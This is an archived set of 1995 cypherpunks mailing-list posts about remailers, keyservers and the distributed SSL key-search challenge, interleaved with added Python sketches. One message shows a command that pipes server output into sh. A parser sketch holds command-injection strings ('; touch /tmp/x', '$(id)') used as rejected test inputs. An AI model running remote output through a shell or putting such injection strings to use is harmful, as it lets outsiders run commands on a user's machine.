-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEF2psLa+QKZS485AQHo/QL9GIEsboNghINgrzE5mnW/2d9i/sn4tgzw
5Ne9zerIdT0QcUWOI/ETw4pYMf8CBPD7iSU1oHxv+qoa/vgxGJCPW9fKYKPURYzE
Aev2zw5Js4BnQqYKhhvPpnEEsGqnuuAd
=0h+o
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *
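
The admission rule proposed in this message, sketched as an added example (not part of the original post and not any keyserver's code; the function name, key IDs and batch format are constructed): a submitted key is accepted only if it carries a signature from a key the server already holds, and keys submitted together are resolved to a fixed point so that one of them can vouch for another once it has itself been linked. Signatures are assumed to have been cryptographically verified already.

```python
from collections import deque

# Added illustration. Key IDs are constructed; every signature listed is
# assumed to have been cryptographically verified before this step.


def admit(held, batch):
    """Apply the linkage rule to one submission batch.

    held:  set of key IDs the server already stores.
    batch: {key_id: set of signer key IDs} for keys submitted together.
    Returns (accepted key IDs in admission order, {rejected key ID: reason}).
    """
    signs = {}  # signer -> batch keys that carry that signer's signature
    for key, signers in batch.items():
        for signer in signers - {key}:        # a self-signature links nothing
            signs.setdefault(signer, set()).add(key)

    accepted, order = set(), []
    queue = deque(sorted(k for k, s in batch.items()
                         if k not in held and (s - {k}) & held))
    while queue:
        key = queue.popleft()
        if key in accepted:
            continue
        accepted.add(key)
        order.append(key)
        # A newly admitted key can now vouch for others in the same batch.
        for nxt in sorted(signs.get(key, ())):
            if nxt not in held and nxt not in accepted:
                queue.append(nxt)

    rejected = {}
    for key, signers in batch.items():
        if key in held or key in accepted:
            continue
        others = signers - {key}
        if not others:
            rejected[key] = "no signature other than its own"
        elif others <= set(batch):
            rejected[key] = "signed only inside an unlinked island"
        else:
            rejected[key] = "no signer is held by this server"
    return order, rejected


def demo():
    held = {"0xAAAA0001", "0xAAAA0002"}
    batch = {
        "0xBBBB0001": {"0xBBBB0001", "0xAAAA0001"},  # signed by a held key
        "0xBBBB0002": {"0xBBBB0001"},                # linked through the batch
        "0xCCCC0001": {"0xCCCC0002"},                # two keys that only sign
        "0xCCCC0002": {"0xCCCC0001"},                #   each other
        "0xDDDD0001": {"0xDDDD0001"},                # self-signed only
        "0xEEEE0001": {"0xFFFF0009"},                # signer unknown to server
    }
    return admit(held, batch)


if __name__ == "__main__":
    order, rejected = demo()
    print("accepted:", order)
    for key, reason in rejected.items():
        print("rejected:", key, "-", reason)
```

Linkage shows only that some held key signed the submission; whether to trust the key still depends on whether that chain reaches the reader's own web of trust.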




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Mon, 28 Aug 95 01:15:18 PDT
To: cypherpunks@toad.com
Subject: oops, re last message
Message-ID: <199508280814.CAA08632@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to add another msg to the clutter, but please send responses to
the previous message (DNS keyserver) to me at don@cs.byu.edu and NOT
at root at _any_ system.
 
Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 28 Aug 95 06:50:49 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199508281350.GAA20804@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ursula"} = "<ursula@cyberspace.org> cpunk";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 28 Aug 95 6:00:57 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
portal   hfinney@shell.portal.com         *##*#*****+*     9:28  99.99%
alumni   hal@alumni.caltech.edu           **********+*    11:12  99.99%
hacktic  remailer@utopia.hacktic.nl       **+*********    11:54  99.99%
spook    remailer@spook.alias.net         -+------+--   2:28:52  99.99%
hroller  hroller@c2.org                   *##*-+*--***    31:39  99.98%
c2       remail@c2.org                    ++++-++--+++  1:31:06  99.98%
mix      mixmaster@remail.obscura.com     --..---.----  6:57:01  99.98%
crown    mixmaster@kether.alias.net       ------.---    2:55:00  99.99%
syrinx   syrinx@c2.org                    -----------   2:13:52  99.98%
flame    remailer@flame.alias.net         ++++++++++++    51:11  99.96%
ideath   remailer@ideath.goldenbear.com   --.-.------   4:57:42  99.95%
bsu-cs   nowhere@bsu-cs.bsu.edu           -##+*+****++    52:12  99.84%
vishnu   mixmaster@vishnu.alias.net       -----------   3:15:22  99.82%
rmadillo remailer@armadillo.com           +++++++++++*  1:34:11  99.67%
vox      remail@vox.xs4all.nl             ---.-----.   17:32:05  99.99%
ncognito ncognito@gate.net                        #+**     3:44  99.46%
replay   remailer@replay.com              **+****_****    44:17  99.34%
penet    anon@anon.penet.fi               - -++-----++  3:58:07  98.44%
ursula   ursula@cyberspace.org                    # *      3:37  97.42%
rahul    homer@rahul.net                  *#*++*******     5:12  99.99%
extropia remail@extropia.wimsey.com       ._.-__..-..  20:21:39  89.74%
ford     remailer@bi-node.zerberus.de     ****#   ****     7:36  87.14%
robo     robo@c2.org                              -***    55:42  55.73%
rebma    remailer@rebma.mn.org                          9:53:43   1.99%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 00:42:35 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: SSl challenge - it was fun!
In-Reply-To: <199508280134.AA19987@junkers.lochard.com.au>
Message-ID: <"swan.cl.cam.:288030:950828074205"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> One problem with being in Australia was that I was asleep when
>> new software updates were announced and tended to get them later
>> than everyone else, and because of this an auto-update would
>> be particularly useful to me if we do this again.
> I would be extremely wary of this as accepting code written by someone else to
> automatically run on your machine is bad.

Indeed !

This is why brclient and brloop are two separate programs ..
(those who don't care about security can run "brclient -Ubrutessl -tssl | sh"
 (for a demo, type "brclient -Ubrutessl -tsslck")
 BUT it means that the SKSP server could run any command on your system!
)
Users should read brclient (and make me blush !) to show that there are no
trapdoors. Then they should read brloop and convince themselves that whatever
data is returned by brclient, no rogue command will be run.
(this is why brloop is written in sh rather than perl -- I assume more people
 read sh than perl ...
)

Note that brclient and brloop do not do any file I/O (so can be chroot'ed, etc)
and apart from "pretties" (such as calling hostname / uname -n to generate an
ID) brclient doesn't exec any other commands, so all you need provide are those
used by brloop (I think sed and head).
If anyone cares to build a "cell" in which to run it, please let me know.
However, I fear that it might be somewhat machine specific.
One problem is that the more recent brloop starts by asking "which servers
should I use" unless they are explicitly set -- this means that you either need
to wire down the host to call (e.g. a local SKSP "local CPU farm" server),
or allow it to make an outgoing call to *ANY* host on port 19957 (well, you
might care to disable access to your local network, 127.* etc).

> If they do not have the expertise, they will hear of it soon enough when
> others scan the offered code.

I've been waiting, but not heard any yet :-))


After my experiences of a handful of old clients killing the server for
everyone, I plan to circumvent the problem by causing rogue brloop's to exit.
Sure -- auto update would be nice, but until the padded cell above is
implemented
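
An added example, not part of the message above and not the brclient/brloop code: the difference between piping a server's reply into sh and treating it as data to be checked. The `SEARCH <start> <count>` reply format, the `./brutessl` argument order and the size limit are assumptions made for illustration; the sample replies are constructed.

```python
import re

# Hypothetical reply format (an assumption, not the real SKSP protocol):
#   SEARCH <start-hex> <count-hex>
WORK_LINE = re.compile(r"SEARCH ([0-9a-f]{1,10}) ([0-9a-f]{1,6})")

KEYSPACE_BITS = 40        # 40-bit keys, as in the SSL challenge
MAX_COUNT = 1 << 24       # largest segment this client accepts (assumed limit)


class RejectedWorkUnit(ValueError):
    """The server's reply was not a well-formed work unit."""


def parse_work_unit(reply):
    """Turn one untrusted reply into (start, count) integers, or raise."""
    # Allow exactly one trailing newline; anything else must match in full,
    # so a second line or trailing shell syntax can never ride along.
    line = reply[:-1] if reply.endswith("\n") else reply
    m = WORK_LINE.fullmatch(line)
    if m is None:
        raise RejectedWorkUnit("malformed reply: %r" % reply)
    start, count = int(m.group(1), 16), int(m.group(2), 16)
    if count == 0 or count > MAX_COUNT:
        raise RejectedWorkUnit("segment size out of range")
    if start + count > (1 << KEYSPACE_BITS):
        raise RejectedWorkUnit("segment runs past the end of the keyspace")
    return start, count


def build_argv(reply):
    """Build the argument vector for the local searcher.

    The program name is fixed by the client, and the arguments are
    re-rendered from integers, so nothing the server sent reaches a shell.
    Run the result with subprocess.run(argv) (no shell=True).
    """
    start, count = parse_work_unit(reply)
    return ["./brutessl", "%010x" % start, "%x" % count]


def vet(replies):
    """Split replies into accepted argument vectors and rejected raw lines."""
    accepted, rejected = [], []
    for reply in replies:
        try:
            accepted.append(build_argv(reply))
        except RejectedWorkUnit:
            rejected.append(reply)
    return accepted, rejected


# Constructed sample replies: one honest, four that "| sh" would have run
# or that fall outside the keyspace.
SAMPLE_REPLIES = [
    "SEARCH 00a0000000 10000\n",
    "SEARCH 00a0000000 10000; touch /tmp/x\n",
    "SEARCH $(id) 10\n",
    "SEARCH ffffffffff 10\n",
    "SEARCH 00a0000000 10000\nSEARCH 0 1\n",
]

if __name__ == "__main__":
    ok, bad = vet(SAMPLE_REPLIES)
    print("accepted:", ok)
    print("rejected:", len(bad))
```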




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@shadow.net (Joe Block)
Date: Mon, 28 Aug 95 05:52:28 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
Message-ID: <v01520c02ac676a6dcba1@[198.79.48.55]>
MIME-Version: 1.0
Content-Type: text/plain



>Better would be to figure out the encoding scheme and post it here.

I like this, myself.  It'd be nice to be able to have the picture of my
choosing instead of a digitized thumbprint...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 28 Aug 95 05:59:31 PDT
To: cypherpunks@toad.com
Subject: JOB_les
Message-ID: <199508281259.IAA13107@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-28-95. NYPaper, Page One lead:


   "Skilled Workers Watch Their Jobs Migrate Overseas. College
   Educated Foreigners Are Doing High-Technology Tasks for Far
   Less Pay."

      The new tools of the information age were supposed to
      help the United States regain an edge in international
      competition. And while that has happened in many
      advanced-technology industries, the combination of
      powerful personal computers and high-capacity undersea
      telephone cables is also subjecting millions of
      white-collar Americans to the same global wage pressures
      that their blue-collar counterparts have long faced. As
      with steel and garment workers, the white-collar
      workers' positions and salaries increasingly depend on
      whether they can justify their higher pay with higher
      productivity. Many fear that the growing tendency of
      corporations to farm out tasks to developing countries
      is widening the gap even further between the rich and
      everybody else in American society by eliminating some
      categories of high-skill, high-wage jobs that make up
      the heart of the middle class.


   "Dissecting the information revolution (in advance): With
   a look at one of Newt's Laws and at 'friction-free
   capitalism.' " [Expands on last week's Aspen article]

      The Aspen conference provided some people with their
      first exposure to Newtonion economics -- which appears
      to be the information-age equivalent of Ronald Reagan's
      trickle-down economics. It is called "friction-free
      capitalism." Nathan Myhrvold noted that one can now
      order custom-fit blue jeans directly from the
      manufacturer.


   Double trouble: JOB_les (17kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 28 Aug 95 09:39:06 PDT
To: hallam@w3.org
Subject: Re: SSL trouble
Message-ID: <9508281635.AA19987@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



I did a distributed scheme for something else that had two levels, a master
and a group of slaves.  Only the slaves talked to the master.  For this 
effort I think a variation of the idea would be better.  Have all of the
brutes contact the master, who will, in the first transaction assign them
to the next slave in a round-robin fashion.  Then all of the transactions
from that point would take place between the brute and the slave:)  (Sounds
kind of like Conan or the Princess Bride.)

The slaves would each be delegated large chunks of the keyspace, but not
keyspace/numslaves.  Maybe 1/16th or something like that, and could ask for
more when their space was depleted.  Periodically, perhaps when requesting
more key space, and/or when a timer pops, the slaves could report results.
What I mean is that every so often they'd report even if they didn't need
more keyspace yet, iff they had any new stats to report.

The nice thing here is that the work of the master and of the slaves is
almost the same.  The slaves don't have to do the initial assignment of
slave, and the master doesn't have to report results, but everything else
is the same.  With careful design you could use the same daemon for both
with a command line argument to tell it if it was the master (-m) or the
slave (-s).  Of course I'm sure you see that this allows you to add as
many levels as you want to the hierarchy.  A slave doesn't care whether
a slave or a brute talks to it.  The only thing that changes with the 
levels is the max size of an allocated chunk.

For each daemon it would be nice to have the minimum, maximum and default
chunk size configurable.  The master might have all three the same, since
it would be expected to talk only to slaves.  That doesn't mean you couldn't
get more than, (for example), 16th of the keyspace to work on.  It just
means that you'd have to make more than one request.

You could make the slave software available as well, and a site with many
machines could have only the slave contact the master to get assigned a
slave to talk to, and could configure all of their brutes to talk to
their own slave.

Software like this is easy to write, (and fun), and we should go for it:)
Of course I do everything like this in C++, but I suppose perl would be the
most portable.  It's a shame it's so aesthetically displeasing to the eye.
perl's never a pleasant read.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/
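
An added sketch of the scheme proposed in the message above, not code from the poster or from the SKSP software: one daemon class serves as master or slave, clamps every request to its configured minimum/maximum/default chunk size, refills from its parent when empty, and reports upward only when it has new stats. All class, method and parameter names are hypothetical.

```python
class KeyspaceDaemon:
    """One node of the hierarchy. The master owns the whole keyspace; a slave
    starts empty and refills from its parent when it runs dry."""

    def __init__(self, name, min_chunk, max_chunk, default_chunk,
                 parent=None, total=0, refill=0):
        if not (0 < min_chunk <= default_chunk <= max_chunk):
            raise ValueError("need 0 < min <= default <= max")
        self.name = name
        self.min_chunk, self.max_chunk = min_chunk, max_chunk
        self.default_chunk = default_chunk
        self.parent = parent
        self.refill = refill      # size this node requests from its parent
        # Unallocated keyspace as half-open (start, end) ranges.
        self.free = [(0, total)] if parent is None and total > 0 else []
        self.outstanding = {}     # (start, end) -> name of the holder
        self.slaves = []          # used by the node that does assignment
        self._next = 0
        self.searched = 0         # keys known searched at or below this node
        self.unreported = 0       # part of `searched` not yet sent upward

    def assign_slave(self):
        """First transaction: hand the caller the next slave, round-robin."""
        slave = self.slaves[self._next % len(self.slaves)]
        self._next += 1
        return slave

    def allocate(self, requester, size=None):
        """Hand out one contiguous chunk, or None when the space is used up.

        The requested size is clamped to [min_chunk, max_chunk], so a caller
        wanting more than the maximum has to make more than one request.
        """
        size = self.default_chunk if size is None else size
        size = max(self.min_chunk, min(self.max_chunk, size))
        if not self.free and self.parent is not None:
            chunk = self.parent.allocate(self.name, self.refill)
            if chunk is not None:
                self.free.append(chunk)
        if not self.free:
            return None
        start, end = self.free.pop(0)
        cut = min(end, start + size)
        if cut < end:
            self.free.insert(0, (cut, end))
        self.outstanding[(start, cut)] = requester
        return (start, cut)

    def record(self, keys):
        """A brute finished `keys` keys, or a child reported that many."""
        self.searched += keys
        self.unreported += keys

    def report(self):
        """Send new stats to the parent; do nothing if there are none."""
        if self.parent is None or self.unreported == 0:
            return False
        self.parent.record(self.unreported)
        self.unreported = 0
        return True


if __name__ == "__main__":
    # Master hands out 1/16th of a 40-bit space at a time, to slaves only.
    master = KeyspaceDaemon("master", 1 << 36, 1 << 36, 1 << 36, total=1 << 40)
    s1 = KeyspaceDaemon("s1", 1 << 20, 1 << 24, 1 << 22,
                        parent=master, refill=1 << 36)
    s2 = KeyspaceDaemon("s2", 1 << 20, 1 << 24, 1 << 22,
                        parent=master, refill=1 << 36)
    master.slaves = [s1, s2]
    for brute in ("brute-a", "brute-b", "brute-c"):
        slave = master.assign_slave()
        print(brute, "->", slave.name, slave.allocate(brute))
```

Because a slave's parent only needs `allocate` and `record`, a slave can sit under another slave, which is the arbitrary-depth property the message describes.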




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 28 Aug 95 09:46:47 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Server congestion
In-Reply-To: <"swan.cl.cam.:027060:950828094002"@cl.cam.ac.uk>
Message-ID: <199508281645.JAA12868@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| > I talked about acks of acks in a previous message, and I guess it was
| > somewhat vague there.
| 
| ... and maybe based on a false premise ?
| 
| > What happened, according to my uninformed view, during the SSL2
| > challenge was that the server got congested, and had problems with
| > both answering to key allocation requests and ack replies.
| 
| Correct.
| 
| > I guess that the load of the machine was so high that it lost packets in the
| > input queues.
| 
| NO.
| 
| The load was very *LOW*.
| The problem was that the single threaded server was spending most of its time
| talking to clients which failed to complete their interactions, and timed out.
| The earlier client "ACK" code didn't hang around long enough, and gave up.
| Later code kept trying ....
| 
| > Client -----> UDP/Key allocation req ----> 
| 
| Nope -- basic fault here !! TCP not UDP !!

Ok, I'll be quiet now. It's funny when you think you know
what is happening based on an uninformed view, and simply
shut out all the other pieces of info that get to you.

By the way, thanks a lot Piete for the effort you put in!
You did excellent, and it was real fun! 32 hours with 
serious performance problems is simply amazing.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 28 Aug 95 07:11:03 PDT
To: cypherpunks@toad.com
Subject: Pre-allocating key segments
Message-ID: <199508281410.KAA16345@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Christian Wettergren <cwe@Csli.Stanford.EDU> writes:
>If the client is unable to retrieve a block from the server, I suggest
>it just picks a random block and starts working on it. It may very
>well not be allocated to someone else, and then the client was able
>to do something good in the meantime even though it didn't get a
>proper key alloc. 

Not only that, but the client ought to allocate some keyspace before it
needs it, as I think one other cpunk suggested.  For instance, if it has
four segments allocated and it's done three of them, it should fork a
process to begin requesting four more segments *while* it is scanning
the last segment, rather than waiting until after it is done and leaving
the machine idle until it can alloc more keys.

David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCUAwUBMEHCiREcrOJethBVAQHqfwP4xfVbdkyR19WA5k4oC0GjW80s3nNrLkXZ
mYspBE8e01waJ+6NYkeyvE4lPzW4OwkKTAtZV64GWovpjsyYh4bb7/mkpkdOktAZ
J9DkHXouQ5M23FImbIcfkVUqQdR5tmSdHQqOpUNYPVqT3JZR6IC9vzwYoqcnQWyY
WIIGs8DTUA==
=9Y8g
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp1.anu.edu.au>
Date: Sun, 27 Aug 95 17:28:13 PDT
To: cypherpunks@toad.com
Subject: SSl challenge - it was fun!
Message-ID: <9508280028.AA28532@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Hi
> 
> Someone asked about the SSL challenge. Well  if you're interested
> here is a personal view from a "client" participant. 
> 
> Despite criticisms posted to this 
> list I think it worked pretty well for a first attempt,
> mainly due to Piete for hacking out new code and fixing things
> pretty quickly when things went wrong.
> 
> There was very little time to test software initially and
> get problems ironed out. I couldn't get brutessl to compile
> without tinkering and had timeout problems with brclient 
> due to the sometimes slow
> link from Australia. Later versions of client software (that I didn't
> get till half way through the challenge) seemed to run without
> any problems and without losing ACKs. But my old client had failed
> to ACK quite a few of its earlier keyspaces and due to lack
> of a logfile I ended up writing a script to redo them and
> ACK them with the new version of the client software.
> 
> One problem with being in Australia was that I was asleep when
> new software updates were announced and tended to get them later
> than everyone else, and because of this an auto-update would
> be particularly useful to me if we do this again.
> 
> In the end it needed a bit of user intervention to get all
> my keyspaces ACKed but the problems were sorted out by the
> time the challenge was half way through and I think the next
> time we try this (and I hope we will) it will run much more
> smoothly. It was a good "learning" experience for all of us
> (especially Piete!) and should be regarded as what it was:
> an experiment that didn't run completely smoothly but was
> ultimately successful.
> 
> Taking part in the challenge was fun and I hope we can do
> another challenge sometime soon.
> 
> One gripe though - my ACKs don't appear on the credits list ;-(
> 
> Sherry
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 28 Aug 95 08:38:45 PDT
To: Scott Brickner <sjb@austin.ibm.com>
Subject: Re: random coincidences
Message-ID: <9508281537.AA00466@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
>  If NetScape uses such a PRNG to select 40bit keys for SSL, then
>  the work to be done in brute-force search going on right now might
>  be *significantly* reduced by knowing the planes on which the
>  numbers lie.  If the constants are particularly poor, there might
>  be as little as ten or twelve bits of real key.

So who here knows 80x86 assembler, is handy with a debugger, and has a few  
hours of spare time to figure out the PRNG?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 02:40:29 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: Server congestion
In-Reply-To: <199508280041.RAA22255@Csli.Stanford.EDU>
Message-ID: <"swan.cl.cam.:027060:950828094002"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I talked about acks of acks in a previous message, and I guess it was
> somewhat vague there.

... and maybe based on a false premise ?

> What happened, according to my uninformed view, during the SSL2
> challenge was that the server got congested, and had problems with
> both answering to key allocation requests and ack replies.

Correct.

> I guess that the load of the machine was so high that it lost packets in the
> input queues.

NO.

The load was very *LOW*.
The problem was that the single threaded server was spending most of its time
talking to clients which failed to complete their interactions, and timed out.
The earlier client "ACK" code didn't hang around long enough, and gave up.
Later code kept trying ....

> Client -----> UDP/Key allocation req ----> 

Nope -- basic fault here !! TCP not UDP !!

> One problem was that the client believed that the ACK had arrived
> at the server if it had sent it off, not counting with the possibility
> of the ACK being lost on the way.

Not the case.
It uses a reliable bytestream, and the client does not consider a keyspace
ACKed until it gets back the "OK" response from the server.
This makes it "at least once", but that isn't a problem.

> I instead propose that the Server sends a acknowledgement
> back to the client once it has received an ACK from a client.

It does, in the reliable bytestream ...

> The client has to handle the case that either the Ack or the
> Server-ack is lost.

As above -- "at least once" -- it just retries.

> I propose it doesn't retransmit immediately,
> but rather waits until next time it has to ack something, and 
> piggybacks the old ack onto the new one.

brclient waits a bit and tries again, before asking for the next.

> If the client is unable to retrieve a block from the server, I suggest
> it just picks a random block and starts working on it. It may very
> well not be allocated to someone else, and then the client was able
> to do something good in the meantime even though it didn't get a
> proper key alloc. 

Nah.
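
An added example, not brclient or server code: why "at least once" delivery is harmless when the server's ACK handling is idempotent. The client treats a segment as ACKed only after it sees "OK", so a lost reply causes a duplicate ACK, which a set-based server absorbs. `AckServer`, `FlakyLink`, `Client` and the fault schedule are hypothetical stand-ins for the TCP exchange, with constructed inputs.

```python
class AckServer:
    """Records searched segments; receiving the same ACK twice changes nothing."""

    def __init__(self):
        self.acked = set()
        self.deliveries = 0       # how many ACK messages actually arrived

    def handle_ack(self, segment):
        self.deliveries += 1
        self.acked.add(segment)   # set insert: idempotent
        return "OK"


class FlakyLink:
    """Constructed stand-in for a connection that sometimes times out.

    `faults` is consumed one entry per call: "drop_request" loses the ACK
    before the server sees it, "drop_reply" loses the server's "OK".
    """

    def __init__(self, server, faults):
        self.server = server
        self.faults = list(faults)

    def call(self, segment):
        fault = self.faults.pop(0) if self.faults else None
        if fault == "drop_request":
            raise TimeoutError("ACK never reached the server")
        reply = self.server.handle_ack(segment)
        if fault == "drop_reply":
            raise TimeoutError("server's OK never reached the client")
        return reply


def ack_until_ok(link, segment, max_tries=5, wait=lambda attempt: None):
    """Retry until the server says OK; return the attempt number or None."""
    for attempt in range(1, max_tries + 1):
        try:
            if link.call(segment) == "OK":
                return attempt
        except TimeoutError:
            wait(attempt)         # "waits a bit and tries again"
    return None


class Client:
    """Keeps finished-but-unconfirmed segments so no ACK is silently lost."""

    def __init__(self, link):
        self.link = link
        self.pending = []

    def finished(self, segment):
        self.pending.append(segment)

    def flush(self):
        """Retry every pending ACK before asking for the next segment."""
        self.pending = [s for s in self.pending
                        if ack_until_ok(self.link, s) is None]
        return len(self.pending)


if __name__ == "__main__":
    server = AckServer()
    link = FlakyLink(server, ["drop_request", "drop_reply"])
    print("confirmed on attempt", ack_until_ok(link, (0, 4096)))
    print("messages received:", server.deliveries, "segments:", len(server.acked))
```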




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 28 Aug 95 11:15:51 PDT
To: cypherpunks@toad.com
Subject: R.I.P. John Brunner
